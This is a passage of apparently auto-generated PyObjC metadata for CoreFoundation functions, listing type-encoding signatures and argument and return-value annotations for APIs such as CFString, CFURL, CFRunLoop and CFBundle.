),
"CFNotificationCenterGetDarwinNotifyCenter": (b"^{__CFNotificationCenter=}",),
"CFPropertyListWrite": (
sel32or64(
b"l@^{__CFWriteStream=}lL^^{__CFError=}",
b"q@^{__CFWriteStream=}qQ^^{__CFError=}",
),
"",
{
"arguments": {
4: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFDataAppendBytes": (
sel32or64(b"v^{__CFData=}^vl", b"v^{__CFData=}^vq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}}},
),
"CFDictionaryGetCount": (
sel32or64(b"l^{__CFDictionary=}", b"q^{__CFDictionary=}"),
),
"CFLocaleCreateLocaleIdentifierFromWindowsLocaleCode": (
b"^{__CFString=}^{__CFAllocator=}I",
"",
{"retval": {"already_cfretained": True}},
),
"CFUserNotificationUpdate": (
sel32or64(
b"l^{__CFUserNotification=}dL^{__CFDictionary=}",
b"i^{__CFUserNotification=}dQ^{__CFDictionary=}",
),
),
"CFMessagePortInvalidate": (b"v^{__CFMessagePort=}",),
"CFSwapInt64": (b"QQ",),
"CFURLCreateWithFileSystemPath": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}lZ",
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}qZ",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetAttributes": (
sel32or64(
b"^{__CFDictionary=}^{__CFAttributedString=}l^{_CFRange=ll}",
b"^{__CFDictionary=}^{__CFAttributedString=}q^{_CFRange=qq}",
),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFSocketSetDefaultNameRegistryPortNumber": (b"vS",),
"CFFileSecurityGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyResourceURLsOfType": (
b"^{__CFArray=}^{__CFBundle=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFConvertFloat32SwappedToHost": (b"f{_CFSwappedFloat32=I}",),
"CFDictionaryReplaceValue": (b"v^{__CFDictionary=}@@",),
"CFXMLTreeCreateFromDataWithError": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Ll^^{__CFDictionary=}",
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Qq^^{__CFDictionary=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {5: {"type_modifier": "o"}},
},
),
"CFTimeZoneSetDefault": (b"v^{__CFTimeZone=}",),
"CFArrayApplyFunction": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^?@", b"v^{__CFArray=}{_CFRange=qq}^?@"),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFMessagePortGetInvalidationCallBack": (
b"^?^{__CFMessagePort=}",
"",
{
"retval": {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"^v"}},
}
}
},
),
"CFUserNotificationGetResponseDictionary": (
b"^{__CFDictionary=}^{__CFUserNotification=}",
),
"CFSwapInt32HostToLittle": (b"II",),
"CFSocketInvalidate": (b"v^{__CFSocket=}",),
"CFStringGetMostCompatibleMacStringEncoding": (sel32or64(b"LL", b"II"),),
"CFRunLoopObserverIsValid": (b"Z^{__CFRunLoopObserver=}",),
"CFStringInsert": (
sel32or64(b"v^{__CFString=}l^{__CFString=}", b"v^{__CFString=}q^{__CFString=}"),
),
"CFXMLParserGetTypeID": (sel32or64(b"L", b"Q"),),
"CFMessagePortGetContext": (
sel32or64(
b"v^{__CFMessagePort=}^{_CFMessagePortContext=l^v^?^?^?}",
b"v^{__CFMessagePort=}^{_CFMessagePortContext=q^v^?^?^?}",
),
),
"CFStringIsEncodingAvailable": (sel32or64(b"ZL", b"ZI"),),
"CFStringGetLength": (sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),),
"CFURLCanBeDecomposed": (b"Z^{__CFURL=}",),
"CFStringCreateWithCStringNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tL^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^tI^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFReadStreamClose": (b"v^{__CFReadStream=}",),
"CFBagCreate": (
sel32or64(
b"^{__CFBag=}^{__CFAllocator=}^^vl^{_CFBagCallBacks=l^?^?^?^?^?}",
b"^{__CFBag=}^{__CFAllocator=}^^vq^{_CFBagCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopAddTimer": (b"v^{__CFRunLoop=}^{__CFRunLoopTimer=}^{__CFString=}",),
"CFDictionaryGetValueIfPresent": (
b"Z^{__CFDictionary=}@^@",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFArrayCreateCopy": (
b"^{__CFArray=}^{__CFAllocator=}^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetLastIndexOfBit": (
sel32or64(
b"l^{__CFBitVector=}{_CFRange=ll}L", b"q^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFDataCreateMutable": (
sel32or64(b"^{__CFData=}^{__CFAllocator=}l", b"^{__CFData=}^{__CFAllocator=}q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringAppendCString": (
sel32or64(b"v^{__CFString=}^tL", b"v^{__CFString=}^tI"),
"",
{"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}}},
),
"CFLocaleGetIdentifier": (b"^{__CFString=}^{__CFLocale=}",),
"CFStringConvertWindowsCodepageToEncoding": (sel32or64(b"LL", b"II"),),
"CFTreeRemove": (b"v^{__CFTree=}",),
"CFBundleCloseBundleResourceMap": (
sel32or64(b"v^{__CFBundle=}s", b"v^{__CFBundle=}i"),
),
"CFStreamCreateBoundPair": (
sel32or64(
b"v^{__CFAllocator=}^^{__CFReadStream=}^^{__CFWriteStream=}l",
b"v^{__CFAllocator=}^^{__CFReadStream=}^^{__CFWriteStream=}q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}},
},
),
"CFRunLoopTimerSetNextFireDate": (b"v^{__CFRunLoopTimer=}d",),
"CFAllocatorSetDefault": (b"v^{__CFAllocator=}",),
"CFPreferencesSetAppValue": (b"v^{__CFString=}@^{__CFString=}",),
"CFTimeZoneGetNextDaylightSavingTimeTransition": (b"d^{__CFTimeZone=}d",),
"CFDateFormatterGetFormat": (b"^{__CFString=}^{__CFDateFormatter=}",),
"CFLocaleCreateLocaleIdentifierFromComponents": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesSynchronize": (b"Z^{__CFString=}^{__CFString=}^{__CFString=}",),
"CFReadStreamCopyDispatchQueue": (
sel32or64(b"^{dispatch_queue_s=}^{__CFReadStream=}", b"@^{__CFReadStream=}"),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetMaximumSizeOfFileSystemRepresentation": (
sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),
),
"CFBundleCreate": (
b"^{__CFBundle=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLGetPortNumber": (sel32or64(b"l^{__CFURL=}", b"i^{__CFURL=}"),),
"CFStringAppendCharacters": (
sel32or64(b"v^{__CFString=}^Tl", b"v^{__CFString=}^Tq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}}},
),
"CFArrayGetLastIndexOfValue": (
sel32or64(b"l^{__CFArray=}{_CFRange=ll}@", b"q^{__CFArray=}{_CFRange=qq}@"),
),
"CFRunLoopTimerCreate": (
sel32or64(
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddLl^?^{_CFRunLoopTimerContext=l^v^?^?^?}",
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddQq^?^{_CFRunLoopTimerContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFRunLoopTimer=}"},
1: {"type": b"^v"},
},
}
}
},
},
),
"CFLocaleCreate": (
b"^{__CFLocale=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringHasSuffix": (b"Z^{__CFString=}^{__CFString=}",),
"CFEqual": (b"Z@@",),
"CFRunLoopGetNextTimerFireDate": (b"d^{__CFRunLoop=}^{__CFString=}",),
"CFErrorCreate": (
sel32or64(
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}l^{__CFDictionary=}",
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}q^{__CFDictionary=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateByCombiningStrings": (
b"^{__CFString=}^{__CFAllocator=}^{__CFArray=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateWithFileSystemRepresentation": (
b"^{__CFString=}^{__CFAllocator=}^t",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFBundleGetPlugIn": (b"^{__CFBundle=}^{__CFBundle=}",),
"CFAllocatorGetPreferredSizeForSize": (
sel32or64(b"l^{__CFAllocator=}lL", b"q^{__CFAllocator=}qQ"),
),
"CFDateFormatterSetFormat": (b"v^{__CFDateFormatter=}^{__CFString=}",),
"CFBinaryHeapApplyFunction": (
b"v^{__CFBinaryHeap=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFRunLoopTimerSetTolerance": (b"v^{__CFRunLoopTimer=}d",),
"CFStringGetBytes": (
sel32or64(
b"l^{__CFString=}{_CFRange=ll}LCZ^tl^l",
b"q^{__CFString=}{_CFRange=qq}ICZ^tq^q",
),
"",
{
"arguments": {
5: {"c_array_length_in_arg": (6, 7), "type_modifier": "o"},
7: {"type_modifier": "o"},
}
},
),
"CFLocaleCopyAvailableLocaleIdentifiers": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateArrayBySeparatingStrings": (
b"^{__CFArray=}^{__CFAllocator=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetDoubleValue": (b"d^{__CFString=}",),
"CFStringCreateMutable": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}l", b"^{__CFString=}^{__CFAllocator=}q"
),
"",
{"retval": {"already_cfretained": True}},
),
"CFSetGetCount": (sel32or64(b"l^{__CFSet=}", b"q^{__CFSet=}"),),
"CFURLCreateWithBytes": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^vlL^{__CFURL=}",
b"^{__CFURL=}^{__CFAllocator=}^vqI^{__CFURL=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFStringCompareWithOptionsAndLocale": (
sel32or64(
b"l^{__CFString=}^{__CFString=}{_CFRange=ll}L^{__CFLocale=}",
b"q^{__CFString=}^{__CFString=}{_CFRange=qq}Q^{__CFLocale=}",
),
),
"CFPropertyListCreateFromStream": (
sel32or64(
b"@^{__CFAllocator=}^{__CFReadStream=}lL^l^^{__CFString=}",
b"@^{__CFAllocator=}^{__CFReadStream=}qQ^q^^{__CFString=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {4: {"type_modifier": "o"}, 5: {"type_modifier": "o"}},
},
),
"CFAbsoluteTimeAddGregorianUnits": (
sel32or64(
b"dd^{__CFTimeZone=}{_CFGregorianUnits=llllld}",
b"dd^{__CFTimeZone=}{_CFGregorianUnits=iiiiid}",
),
),
"CFLocaleCopyCurrent": (
b"^{__CFLocale=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDateFormatterGetLocale": (b"^{__CFLocale=}^{__CFDateFormatter=}",),
"CFURLEnumeratorGetSourceDidChange": (b"Z^{__CFURLEnumerator=}",),
"CFNullGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringUppercase": (b"v^{__CFString=}^{__CFLocale=}",),
"CFTreeGetFirstChild": (b"^{__CFTree=}^{__CFTree=}",),
"CFAbsoluteTimeGetDayOfYear": (
sel32or64(b"ld^{__CFTimeZone=}", b"id^{__CFTimeZone=}"),
),
"CFURLCreateFromFileSystemRepresentation": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^tlZ", b"^{__CFURL=}^{__CFAllocator=}^tqZ"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFBundleGetInfoDictionary": (b"^{__CFDictionary=}^{__CFBundle=}",),
"CFByteOrderGetCurrent": (sel32or64(b"l", b"q"),),
"CFAttributedStringEndEditing": (b"v^{__CFAttributedString=}",),
"CFUserNotificationCancel": (
sel32or64(b"l^{__CFUserNotification=}", b"i^{__CFUserNotification=}"),
),
"CFUserNotificationSecureTextField": (sel32or64(b"Ll", b"Qq"),),
"CFBitVectorCreate": (
sel32or64(
b"^{__CFBitVector=}^{__CFAllocator=}^Cl",
b"^{__CFBitVector=}^{__CFAllocator=}^Cq",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
1: {"c_array_of_variable_length": True, "type_modifier": "n"}
},
},
),
"CFCharacterSetRemoveCharactersInRange": (
sel32or64(
b"v^{__CFCharacterSet=}{_CFRange=ll}", b"v^{__CFCharacterSet=}{_CFRange=qq}"
),
),
"CFMachPortSetInvalidationCallBack": (
b"v^{__CFMachPort=}^?",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMachPort=}"},
1: {"type": b"^v"},
},
}
}
}
},
),
"CFCharacterSetAddCharactersInString": (b"v^{__CFCharacterSet=}^{__CFString=}",),
"CFBitVectorGetBitAtIndex": (
sel32or64(b"L^{__CFBitVector=}l", b"I^{__CFBitVector=}q"),
),
"CFURLIsFileReferenceURL": (b"Z^{__CFURL=}",),
"CFURLCopyPath": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetFirstIndexOfValue": (
sel32or64(b"l^{__CFArray=}{_CFRange=ll}@", b"q^{__CFArray=}{_CFRange=qq}@"),
),
"CFCharacterSetCreateWithCharactersInRange": (
sel32or64(
b"^{__CFCharacterSet=}^{__CFAllocator=}{_CFRange=ll}",
b"^{__CFCharacterSet=}^{__CFAllocator=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetIsLongCharacterMember": (
sel32or64(b"Z^{__CFCharacterSet=}L", b"Z^{__CFCharacterSet=}I"),
),
"CFUUIDCreateFromUUIDBytes": (
b"^{__CFUUID=}^{__CFAllocator=}{_CFUUIDBytes=CCCCCCCCCCCCCCCC}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopAddSource": (b"v^{__CFRunLoop=}^{__CFRunLoopSource=}^{__CFString=}",),
"CFDictionaryContainsValue": (b"Z^{__CFDictionary=}@",),
"CFTimeZoneCopyKnownNames": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyPreferredLocalizationsFromArray": (
b"^{__CFArray=}^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorFlipBitAtIndex": (
sel32or64(b"v^{__CFBitVector=}l", b"v^{__CFBitVector=}q"),
),
"CFPropertyListCreateXMLData": (
b"^{__CFData=}^{__CFAllocator=}@",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateResourcePropertyForKeyFromBookmarkData": (
b"@^{__CFAllocator=}^{__CFString=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDateGetAbsoluteTime": (b"d^{__CFDate=}",),
"CFNumberIsFloatType": (b"Z^{__CFNumber=}",),
"CFTreePrependChild": (b"v^{__CFTree=}^{__CFTree=}",),
"CFRunLoopWakeUp": (b"v^{__CFRunLoop=}",),
"CFDateFormatterCreateStringWithDate": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDateFormatter=}^{__CFDate=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetHasMemberInPlane": (
sel32or64(b"Z^{__CFCharacterSet=}l", b"Z^{__CFCharacterSet=}q"),
),
"CFURLCopyResourceSpecifier": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFold": (
sel32or64(b"v^{__CFString=}L^{__CFLocale=}", b"v^{__CFString=}Q^{__CFLocale=}"),
),
"CFStringTokenizerCopyCurrentTokenAttribute": (
sel32or64(b"@^{__CFStringTokenizer=}L", b"@^{__CFStringTokenizer=}Q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFNotificationCenterRemoveEveryObserver": (b"v^{__CFNotificationCenter=}@",),
"CFMessagePortGetName": (b"^{__CFString=}^{__CFMessagePort=}",),
"CFURLCopyPassword": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamClose": (b"v^{__CFWriteStream=}",),
"CFMessagePortCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMessagePort=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMessagePort=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetCString": (
sel32or64(b"Z^{__CFString=}^tlL", b"Z^{__CFString=}^tqI"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "o"}}},
),
"_CFAutoreleasePoolPrintPools": (b"v",),
"CFPropertyListCreateData": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}@lL^^{__CFError=}",
b"^{__CFData=}^{__CFAllocator=}@qQ^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFURLCopyQueryString": (
b"^{__CFString=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopTimerCreateWithHandler": (
sel32or64(
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddLl@?",
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddQq@?",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^v"},
1: {"type": b"^{__CFRunLoopTimer=}"},
},
},
"block": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"^{__CFRunLoopTimer=}"}},
},
}
},
},
),
"CFTimeZoneCopyAbbreviationDictionary": (
b"^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringConvertEncodingToIANACharSetName": (
sel32or64(b"^{__CFString=}L", b"^{__CFString=}I"),
),
"CFSwapInt16LittleToHost": (b"SS",),
"CFNumberFormatterSetProperty": (b"v^{__CFNumberFormatter=}^{__CFString=}@",),
"CFSocketCopyPeerAddress": (
b"^{__CFData=}^{__CFSocket=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateFromFileSystemRepresentationRelativeToBase": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^tlZ^{__CFURL=}",
b"^{__CFURL=}^{__CFAllocator=}^tqZ^{__CFURL=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFAttributedStringSetAttributes": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFDictionary=}Z",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFDictionary=}Z",
),
),
"CFNumberFormatterCopyProperty": (
b"@^{__CFNumberFormatter=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSocketGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLGetBaseURL": (b"^{__CFURL=}^{__CFURL=}",),
"CFSetGetCountOfValue": (sel32or64(b"l^{__CFSet=}@", b"q^{__CFSet=}@"),),
"CFWriteStreamSetProperty": (b"Z^{__CFWriteStream=}^{__CFString=}@",),
"CFDictionarySetValue": (b"v^{__CFDictionary=}@@",),
"CFRunLoopSourceGetTypeID": (sel32or64(b"L", b"Q"),),
"CFWriteStreamCopyError": (
b"^{__CFError=}^{__CFWriteStream=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorSetBits": (
sel32or64(
b"v^{__CFBitVector=}{_CFRange=ll}L", b"v^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFURLCreateBookmarkDataFromAliasRecord": (
b"^{__CFData=}^{__CFAllocator=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringRemoveAttribute": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFString=}",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFString=}",
),
),
"CFURLCreateFromFSRef": (
b"^{__CFURL=}^{__CFAllocator=}^{FSRef=[80C]}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "n"}},
},
),
"CFBitVectorFlipBits": (
sel32or64(
b"v^{__CFBitVector=}{_CFRange=ll}", b"v^{__CFBitVector=}{_CFRange=qq}"
),
),
"CFCalendarCopyCurrent": (
b"^{__CFCalendar=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopAddObserver": (b"v^{__CFRunLoop=}^{__CFRunLoopObserver=}^{__CFString=}",),
"CFURLCreateCopyDeletingPathExtension": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMessagePortIsValid": (b"Z^{__CFMessagePort=}",),
"CFBundleCopySupportFilesDirectoryURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberGetType": (sel32or64(b"l^{__CFNumber=}", b"q^{__CFNumber=}"),),
"CFDataCreateCopy": (
b"^{__CFData=}^{__CFAllocator=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryCreateMutableCopy": (
sel32or64(
b"^{__CFDictionary=}^{__CFAllocator=}l^{__CFDictionary=}",
b"^{__CFDictionary=}^{__CFAllocator=}q^{__CFDictionary=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringConvertEncodingToNSStringEncoding": (sel32or64(b"LL", b"QI"),),
"CFXMLParserGetSourceURL": (b"^{__CFURL=}^{__CFXMLParser=}",),
"CFSetContainsValue": (b"Z^{__CFSet=}@",),
"CFBundleCopyInfoDictionaryForURL": (
b"^{__CFDictionary=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMessagePortSetInvalidationCallBack": (
b"v^{__CFMessagePort=}^?",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMessagePort=}"},
1: {"type": b"^v"},
},
}
}
}
},
),
"CFTreeRemoveAllChildren": (b"v^{__CFTree=}",),
"CFFileDescriptorIsValid": (b"Z^{__CFFileDescriptor=}",),
"CFSetGetValueIfPresent": (
b"Z^{__CFSet=}@^@",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFBinaryHeapGetCount": (
sel32or64(b"l^{__CFBinaryHeap=}", b"q^{__CFBinaryHeap=}"),
),
"CFRunLoopContainsObserver": (
b"Z^{__CFRunLoop=}^{__CFRunLoopObserver=}^{__CFString=}",
),
"CFRunLoopObserverGetOrder": (
sel32or64(b"l^{__CFRunLoopObserver=}", b"q^{__CFRunLoopObserver=}"),
),
"CFBagReplaceValue": (b"v^{__CFBag=}@",),
"CFTreeSetContext": (
sel32or64(
b"v^{__CFTree=}^{_CFTreeContext=l^v^?^?^?}",
b"v^{__CFTree=}^{_CFTreeContext=q^v^?^?^?}",
),
),
"CFReadStreamCopyProperty": (
b"@^{__CFReadStream=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringIsHyphenationAvailableForLocale": (b"Z^{__CFLocale=}",),
"CFWriteStreamCopyDispatchQueue": (
sel32or64(b"^{dispatch_queue_s=}^{__CFWriteStream=}", b"@^{__CFWriteStream=}"),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopSourceCreate": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}l^{_CFRunLoopSourceContext=l^v^?^?^?^?^?^?^?^?}",
b"^{__CFRunLoopSource=}^{__CFAllocator=}q^{_CFRunLoopSourceContext=q^v^?^?^?^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetInvert": (b"v^{__CFCharacterSet=}",),
"CFMachPortInvalidate": (b"v^{__CFMachPort=}",),
"CFSwapInt32BigToHost": (b"II",),
"CFDataReplaceBytes": (
sel32or64(b"v^{__CFData=}{_CFRange=ll}^vl", b"v^{__CFData=}{_CFRange=qq}^vq"),
"",
{"arguments": {2: {"c_array_length_in_arg": 3, "type_modifier": "n"}}},
),
"CFDataGetBytePtr": (
b"^v^{__CFData=}",
"",
{"retval": {"c_array_of_variable_length": True}},
),
"CFSocketDisableCallBacks": (sel32or64(b"v^{__CFSocket=}L", b"v^{__CFSocket=}Q"),),
"CFBundleCopyLocalizationsForURL": (
b"^{__CFArray=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFReadStreamGetBuffer": (
sel32or64(b"^v^{__CFReadStream=}l^l", b"^v^{__CFReadStream=}q^q"),
"",
{
"retval": {"c_array_length_in_arg": 2},
"arguments": {2: {"type_modifier": "o"}},
},
),
"CFErrorGetDomain": (b"^{__CFString=}^{__CFError=}",),
"CFStringHasPrefix": (b"Z^{__CFString=}^{__CFString=}",),
"CFTimeZoneIsDaylightSavingTime": (b"Z^{__CFTimeZone=}d",),
"CFWriteStreamCanAcceptBytes": (b"Z^{__CFWriteStream=}",),
"CFWriteStreamOpen": (b"Z^{__CFWriteStream=}",),
"CFBitVectorSetCount": (sel32or64(b"v^{__CFBitVector=}l", b"v^{__CFBitVector=}q"),),
"CFErrorCreateWithUserInfoKeysAndValues": (
sel32or64(
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}l^@^@l",
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}q^@^@q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {"c_array_length_in_arg": 5, "type_modifier": "n"},
4: {"c_array_length_in_arg": 5, "type_modifier": "n"},
},
},
),
"CFUserNotificationCreate": (
sel32or64(
b"^{__CFUserNotification=}^{__CFAllocator=}dL^l^{__CFDictionary=}",
b"^{__CFUserNotification=}^{__CFAllocator=}dQ^i^{__CFDictionary=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}},
},
),
"CFURLResourceIsReachable": (
b"Z^{__CFURL=}^^{__CFError=}",
"",
{
"arguments": {
1: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFStringIsSurrogateHighCharacter": (b"ZT",),
"CFPropertyListCreateWithData": (
sel32or64(
b"@^{__CFAllocator=}^{__CFData=}L^l^^{__CFError=}",
b"@^{__CFAllocator=}^{__CFData=}Q^q^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {"type_modifier": "o"},
4: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFSocketGetDefaultNameRegistryPortNumber": (b"S",),
"CFBundleCopyLocalizationsForPreferences": (
b"^{__CFArray=}^{__CFArray=}^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopObserverInvalidate": (b"v^{__CFRunLoopObserver=}",),
"CFURLGetFSRef": (
b"Z^{__CFURL=}^{FSRef=[80C]}",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFURLCreateCopyDeletingLastPathComponent": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCreateBundlesFromDirectory": (
b"^{__CFArray=}^{__CFAllocator=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFindCharacterFromSet": (
sel32or64(
b"Z^{__CFString=}^{__CFCharacterSet=}{_CFRange=ll}L^{_CFRange=ll}",
b"Z^{__CFString=}^{__CFCharacterSet=}{_CFRange=qq}Q^{_CFRange=qq}",
),
"",
{"arguments": {4: {"type_modifier": "o"}}},
),
"CFAttributedStringCreateMutable": (
sel32or64(
b"^{__CFAttributedString=}^{__CFAllocator=}l",
b"^{__CFAttributedString=}^{__CFAllocator=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeGetContext": (
sel32or64(
b"v^{__CFTree=}^{_CFTreeContext=l^v^?^?^?}",
b"v^{__CFTree=}^{_CFTreeContext=q^v^?^?^?}",
),
),
"CFArrayCreateMutable": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}l^{_CFArrayCallBacks=l^?^?^?^?}",
b"^{__CFArray=}^{__CFAllocator=}q^{_CFArrayCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFShow": (b"v@",),
"CFFileSecuritySetOwner": (b"Z^{__CFFileSecurity=}I",),
"CFSocketCopyAddress": (
b"^{__CFData=}^{__CFSocket=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBagGetValues": (
